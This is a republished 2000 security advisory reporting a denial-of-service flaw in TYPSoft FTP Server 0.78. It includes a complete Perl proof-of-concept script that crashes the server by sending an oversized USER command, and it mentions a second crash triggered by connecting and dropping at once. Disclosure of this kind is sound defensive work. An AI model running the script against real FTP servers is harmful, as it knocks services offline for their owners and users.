Advisories : TYPSoft FTP Server remote DoS Problem

main menu

- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news

discussions

- read forum
- new topic
- search

meetings

- meetings list
- recent additions
- add your info

top 100 sites

- visit top sites
- sign up now
- members

webmasters

- add your url
- add domain
- search box
- link to us

projects

- our projects
- free email

m4d network

- security software
- secureroot
- m4d.com

Home : Advisories : TYPSoft FTP Server remote DoS Problem

Title:	TYPSoft FTP Server remote DoS Problem
Released by:	Synnergy
Date:	12th September 2000
Printable version:	Click here

           *******************************************

           +  TYPSoft FTP Server remote DoS Problem  +

           *******************************************

           #            Advisory by dethy            #

	   #            www.synnergy.net             #

           |=========================================|



			Advisory # 12



Vulnerable:	TYPSoft FTP Server 0.78  [ although 0.7X are also vulnerable ]

Systems   :	Win9X, WinNT

Product   :	http://www.multimania.com/typsoft/

Discovery :	dethy@synnergy.net



		" Another trivial bug. "



Description

-----------



TYPSoft FTP is a Freeware FTP server, with all the necessary

features to facilitate beginners and advanced users.





Vulnerability

-------------



TYPSoft FTP Server does not correctly deal with long commands

over 2048 bytes [ 2k ]. So by sending a long 'user', 'pass',

'cwd', etc, causing the server to hang and increase system resources.

The process will not be active until it is manually restarted.



!! NEW !!

After releasing this advisory Noam Rathaus from http://www.BeyondSecurity.com

mailed me, and said:



 .. "this product is also vulnerable if you connect to the server, but not 

send anything (do the SYN/ACK sequence but disconnect immediately). This is 

due to the fact that they use a DELPHI TSocket class, which doesn't handle 

exceptions very well. "





-------



simple script to send a long 'user' command to the server, resulting

in the ftpd crashing.



==================================

#!/usr/bin/perl

use Getopt::Std;

use IO::Socket;

getopts('s:', \%args);

if(!defined($args{s})){&usage;}

$serv = $args{s};

$foo = "A"; $number = 2048; 

$data .= $foo x $number; $EOL="\015\012";

$remote = IO::Socket::INET->new(

		    Proto	=> "tcp",

		    PeerAddr	=> $args{s},

		    PeerPort	=> "ftp(21)",

		) || die("Unable to connect to ftp port at $args{s}\n");

$remote->autoflush(1);

print $remote "USER $data". $EOL;

while (<$remote>){ print }

print("\nCrash was successful !\n");



sub usage {die("\n$0 -s \n\n");}

====================================



Solution

--------



The vendor [ typsoft@altern.org ] has been contacted, wait until a patched version 

comes out or use an alternative product.





Disclaimer

----------



Synnergy Networks may not be held liable for the use and/or potential effects of these

programs or advisories, nor the content contained within. Use them at your own risk.



---------------------------------------------------------------------------------------

Web	: http://www.synnergy.net

E-Mail	: dethy@synnergy.net